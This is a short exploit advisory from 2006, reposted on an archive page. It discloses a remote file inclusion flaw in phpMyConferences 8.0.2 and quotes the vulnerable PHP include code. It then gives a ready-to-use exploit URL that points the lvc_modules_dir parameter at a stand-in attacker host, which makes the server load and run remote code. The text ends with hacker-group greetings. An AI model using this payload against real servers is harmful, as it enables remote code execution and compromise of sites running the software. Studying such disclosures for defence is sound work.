Home / os / solaris

phpMyConferences-8.0.2-2.txt

Posted on 02 November 2006

# phpMyConferences <= 8.0.2 Remote File Inclusion # # Found by mfp.c => mfp.c@hotmail.com [brazil rlz] # # Greetz: F-117, Silver lords e pra tu pri :* ################################################ # # # Arquivo: library.inc.php # # Bug: # if (!$gloaded_modules[$image_name]) # { # include($lvc_modules_dir.'/'.$module_name.'.module.php'); # $gloaded_modules[$module_name] = true; # } # # # Exploit: # # http://localhost/phpMyConferences_8.0.2/common/visiteurs/include/library.inc.php?lvc_modules_dir=http://attack/ # # # THANKS: Milw0rm,str0ke, google.... # # ###############################################

 

TOP